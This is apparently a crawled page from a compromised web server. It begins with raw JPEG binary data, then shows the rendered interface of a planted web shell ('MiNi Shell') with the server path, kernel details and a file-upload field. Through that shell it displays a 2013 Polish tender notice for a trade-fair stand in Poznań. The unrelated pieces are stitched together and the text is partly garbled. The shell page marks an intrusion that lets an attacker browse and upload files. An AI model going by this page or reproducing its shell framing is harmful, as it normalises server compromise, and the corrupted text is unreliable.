JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130507/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130507/178584-N-2013.html

<p class="kh_header"><b>Poznań: Wizualizacja, aranżacja i wykonanie zabudowy
Wielkopolskiego stoiska na targi krajowe i zagraniczne wraz z usługami w zakresie montażu, demontażu w oparciu o
gotowe projekty graficzno-plastyczne oraz obsługi technicznej, transportu, magazynowania i sprzątania tego stoiska
podczas targów.</b><br>
<b>Numer ogłoszenia: 178584 - 2013; data zamieszczenia: 07.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielkopolska Organizacja Turystyczna , ul. 27 Grudnia 17/19, 61-737 Poznań, woj. wielkopolskie, tel. 61 6645233, 234, faks 61 6645235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.wot.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Stowarzyszenie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wizualizacja, aranżacja i wykonanie zabudowy
Wielkopolskiego stoiska na targi krajowe i zagraniczne wraz z usługami w zakresie montażu, demontażu w oparciu o
gotowe projekty graficzno-plastyczne oraz obsługi technicznej, transportu, magazynowania i sprzątania tego stoiska
podczas targów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. INFORMACJE OGÓLNE O
ZAMÓWIENIU Przedmiotem zamówienia jest realizacja przedsięwzięcia pn. Wizualizacja, aranżacja i wykonanie
zabudowy Wielkopolskiego stoiska na targi krajowe wraz z usługami w zakresie montażu, demontażu w oparciu o
gotowe projekty graficzno plastyczne oraz obsługi technicznej, transportu, magazynowania i sprzątania tego stoiska
podczas targów Zamówienie dotyczy realizacji projektu pt. Kompleksowa promocja markowego produktu
turystycznego Wielka Pętla Wielkopolski - współfinansowanego przez Unię Europejską z Europejskiego Funduszu
Rozwoju Regionalnego w ramach Priorytetu VI - Turystyka i środowisko kulturowe, Działania 6.1 - Turystyka,
Schematu II - Promocja i informacja turystyczna Wielkopolskiego Regionalnego Programu Operacyjnego na lata
2007-2013. Realizacja zamówienia obejmuje szczegółowy zakres następujących zadań : Zadanie nr 1 Wykonanie
zabudowy Wielkopolskiego stoiska (30m2 oraz 120m2) w oparciu o przedstawione projekty graficzno-plastyczne stoiskstanowiące załącznik nr 7 do Specyfikacji Istotnych Warunków Zamówienia. Zadanie nr 2 Usługi w zakresie
montażu,demontażu, sprzątania oraz transportu i magazynowania elementów stoiska wraz z niezbędną obsługą
techniczną w lokalizacjach wyznaczonych przez Zamawiającego. II. WYKONANIE Zadanie nr 1 Zamawiający zleca
wykonanie zabudowy Wielkopolskiego stoiska (30m2 oraz 120m2) w oparciu o gotowe projekty graficzno-plastyczne
stoiska, których wizualizacja wraz z dokumentacją techniczną wykonawstwa przedstawiona jest w załączniku nr 7 do
SIWZ. Wykorzystanie poszczególnych projektów graficznych stoiska zależne będzie od powierzchni poszczególnych
targów - lista w pkt. IV Wykaz targów turystycznych z udziałem Wielkopolskiej Organizacji Turystycznej na lata 2013 -
2014 niniejszego załącznika. Dzieło zostanie wykonane za pomocą narzędzi i materiałów pozyskanych przez
Wykonawcę. Zadanie nr 2 Zamawiający zleca realizację usług w zakresie montażu, demontażu, sprzątania oraz
transportu i magazynowania elementów stoiska wraz z niezbędną obsługą techniczną w miejscach i terminach
określonych w pkt. IV Wykaz targów turystycznych z udziałem Wielkopolskiej Organizacji Turystycznej na lata 2013 -
2014 niniejszego załącznika. 1) Warunki techniczne montażu i eksploatacji stoisk targowych określają w
szczególności: A. Rozporządzenie Ministra Infrastruktury z dnia 6.02.2003r. w sprawie BHP podczas wykonywania
robót budowlanych (Dz. U. nr 47 poz. 401), B. Projekty graficzno - plastyczne stoiska w wariantach zabudowy 30 i
120 m2 wraz z dokumentacją techniczną stanowiące załączniki 7a i 7b SIWZ, C. Wykonawca zobowiązuje się do
udzielania Zamawiającemu wszelkiej pomocy technicznej w trakcie trwania imprezy targowej oraz usług sprzątania
stoiska każdorazowo po montażu i demontażu stoiska i każdego dnia targowego przed i po zakończeniu imprez
targowych wymienionych w pkt. IV Wykaz targów turystycznych z udziałem Wielkopolskiej Organizacji Turystycznej na
lata 2013 - 2014 niniejszego załącznika obejmującej zapewnienie prawidłowego funkcjonowania elementów stoiska (w
szczególności sprzętu elektronicznego, wiązki elektrycznej, punktów świetlnych itp.) poprzez pracowników własnych
lub pracowników wynajętych. D. Wykonawca przy wykonywaniu LOGO oraz claimu zobowiązany jest do stosowania
zasad Systemu Identyfikacji Wizualnej, który jest własnością Zamawiającego. Założenia Systemu Identyfikacji
Wizualnej wraz ze wszystkimi niezbędnymi informacjami zostanie przekazany Wykonawcy wraz z projektem w
terminie ustalonym przez strony, nie dłuższym niż 14 dni od dnia zawarcia niniejszej umowy. E. W każdym roku
obowiązywania umowy Wykonawca zobowiązany jest do zabudowy stoisk targowych przy użyciu elementów
wizualizacji w formie zdjęć uwzględniających specyfikę treści hasła przewodniego przyjętego przez Zamawiającego na
dany rok kalendarzowy. Zdjęcia dostarczane będą Wykonawcy przez Zamawiającego na 30 dni kalendarzowych przed
dniem rozpoczęcia pierwszej imprezy targowej w danym roku. F. Wykonawca zobowiązuje się, że wykonując
przedmiot umowy nie naruszy praw majątkowych osób trzecich i przekaże Zamawiającemu elementy stoiska w stanie
wolnym od obciążeń prawami osób trzecich. 2) Warunki odbioru wykonanych prac - montaż stoiska: A. Odbiór prac
montażowych i każdorazowe przekazanie stoiska do eksploatacji Zamawiającemu, dokonane będzie w dniu
poprzedzającym dzień rozpoczęcia imprezy targowej na podstawie protokołu odbioru. Bezwzględne zgłoszenie odbioru
stoiska targowego musi nastąpić najpóźniej do godziny 16:00 dnia poprzedzającego rozpoczęcie imprezy targowej. B.
W przypadku stoiska 120 m2 Wykonawca w ramach realizacji zadania zobowiązany jest każdorazowo do wyposażenia
stoiska w media tj. prąd, wodę oraz odprowadzenie ścieków . Natomiast w przypadku stoiska 30 m2 Wykonawca w
ramach realizacji zadania zobowiązany jest każdorazowo do wyposażenia stoiska w media tj. prąd. Po zakończeniu
każdych targów Wykonawca zobowiązany jest do odłączenia w/w mediów oraz demontażu stoiska. Wszelkie koszty
przyłączy i eksploatacji mediów leżą po stronie Wykonawcy. C. Nieobecność Zamawiającego lub jego przedstawicielado godziny 20:00 dnia poprzedzającego dzień rozpoczęcia imprezy targowej Wykonawcę do dokonania
odbiorujednostronnego, który jest podstawą do wystawienia faktury VAT. 3) Warunki odbioru wykonanych prac -
demontaż stoiska oraz transportu i magazynowania: A. Wykonawca i Zamawiający sporządzają w dniu zakończenia
imprezy targowej protokół zdania Wykonawcy wyposażenia stoiska targowego z opisem stanu przekazywanego
wyposażenia Wykonawcy do magazynowania B. Każdorazowe przekazanie stoiska do przechowania Wykonawcy
dokonywane będzie w dniu zakończenia imprezy. C. Wykonawca transportując, montując oraz demontując i
magazynując stoisko, zobowiązuje się zapewnić ochronę przekazanego mu mienia Zamawiającego w czasie
obowiązywania umowy. D. Wykonawca zobowiązuje się ubezpieczyć na wypadek zaginięcia lub uszkodzenia
elementów stoiska targowego z przyczyn niezawinionych przez Zamawiającego. Ewentualne straty Zamawiającego
wynikłe z utraty lub zniszczenia elementów stoiska targowego, za które odpowiada Wykonawca w okresie w którym
posiada przedmiotowe elementy, zostaną wówczas pokryte przez ubezpieczyciela Wykonawcy lub z jego własnych
środków. E. Wszelkie koszty przyłączy i eksploatacji mediów leżą po stronie Wykonawcy. III. UBEZPIECZENIE PRAC 1)
Wykonawca zobowiązuje się na swój koszt ubezpieczyć na wypadek zaginięcia lub uszkodzenia elementów i
wyposażenia stoiska targowego z przyczyn niezawinionych przez Zamawiającego. 2) Wykonawca oświadcza, iż
ewentualne straty Zamawiającego wynikłe z utraty lub zniszczenia elementów i wyposażenia stoiska targowego, za
które odpowiada wykonawca w okresie, w którym posiada przedmiotowe elementy, zostaną pokryte przez
ubezpieczyciela Wykonawcy. 3) Kopię polisy ubezpieczeniowej potwierdzonej za zgodność z oryginałem Wykonawca
dostarczy Zamawiającemu w formie elektronicznej i papierowej w terminie wyznaczonym przez strony.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.38.00-4, 60.10.00.00-9, 63.12.20.00-0, 31.50.00.00-1, 39.15.00.00-8, 39.17.20.00-8, 39.14.11.00-3, 39.15.11.00-6, 39.11.20.00-0, 32.33.33.00-9, 32.32.46.00-6, 39.29.85.00-2, 79.95.60.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie ar.22 ust.1 ustawy, o udzielnie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy
spełniają warunki dotyczące posiadania uprawnień do wykonywania określonej działalności i czynności, jeżeli
przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. wykażą, że wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  5 zamówień/usług o powierzchni ponad 30 m 2, oraz co najmniej 1 zamówienie/usługę o powierzchni ponad 100 m 2, w skład których -  każdego z tych zamówień/usług - wchodziło wykonanie zabudowy stoiska wraz z usługami w zakresie jego montażu, demontażu, obsługi techniczno - serwisowej,  stoiska  oraz załączą dowody,  czy zamówienia/usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia żadnego konkretnego dodatkowego warunku w tym zakresie poza treścią wynikającą
z art.22 ust.1 ustawy Prawo zamówień publicznych i ogranicza się do wymogu złożenia w tym zakresie
oświadczenia przez wykonawcę o treści wskazanej w ww artykule - tj.dysponowaniem odpowiednim
potencjałem technicznym zdolnym do wykonania zamowienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia żadnego konkretnego dodatkowego warunku w tym zakresie poza treścią wynikającą
z art.22 ust.1 ustawy Prawo zamówień publicznych i ogranicza się do wymogu złożenia w tym zakresie
oświadczenia przez wykonawcę o treści wskazanej w ww artykule - tj.dysponowaniem odpowiednim
potencjałem technicznym zdolnym do wykonania zamowienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. wykażą, że posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 100 tys zł 
brutto złożonej oferty. Potwierdzeniem spełnienia warunku jest dostarczenie informacji banku lub spółdzielczej
kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność
kredytową Wykonawcy - w wysokości co najmniej 100 tys zł. brutto - wystawionej nie
wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Dowodami o którym mowa są: 1.poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług
okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem
terminu składania wniosków o dopuszczenie do udziału w konkursie; 2.oświadczenie wykonawcy, jeżeli z
uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać
poświadczenia, o którym mowa przy pkt. 1, 3.w niniejszym postępowaniu, Wykonawca w miejsce
poświadczeń, o których mowa przy pkt. 1, może przedłożyć dokumenty potwierdzające należyte
wykonanie usług.;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień niniejszej umowy może nastąpić w sytuacjach lub warunkach określonych poniżej.
1.Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących
przepisów prawa w zakresie mającym wpływ na realizacją przedmiotu umowy. 2.Gdy zajdzie konieczność
zastosowania (dostawy) towarów zamiennych, w sytuacji gdy towary przewidziane (zaoferowane) w ofercie
wybranego Wykonawcy nie mogą być użyte przy realizacji przedmiotu umowy z powodu zaprzestania ich produkcji lub
na przykład wycofania z rynku. 3.Strony mogą domagać się przedłużenia terminu wykonania przedmiotu umowy tylko
i wyłącznie z powodu wystąpienia siły wyższej, rozumianej jako wystąpienie czynnika niezależnego i niezawinionego
przez którąkolwiek ze stron, mającego wpływ na realizację postanowień umowy. Termin wykonania umowy może
zostać przedłużony, w takiej sytuacji, o czas występowania siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wot.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielkopolska Organizacja Turystyczna
ul. 27 Grudnia 17/19, piętro I, pokój 103 61-737 Poznań..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2013 godzina 10:00, miejsce: Wielkopolska Organizacja Turystyczna
ul. 27 Grudnia 17/19, piętro I, pokój 103 61-737 Poznań..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie dotyczy realizacji projektu pt. Kompleksowa promocja markowego produktu turystyki
wodnej Wielka Pętla Wielkopolski - współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju
Regionalnego w ramach Priorytetu VI - Turystyka i środowisko kulturowe, Działania 6.1 - Turystyka, Schematu II -
Promocja i informacja turystyczna Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com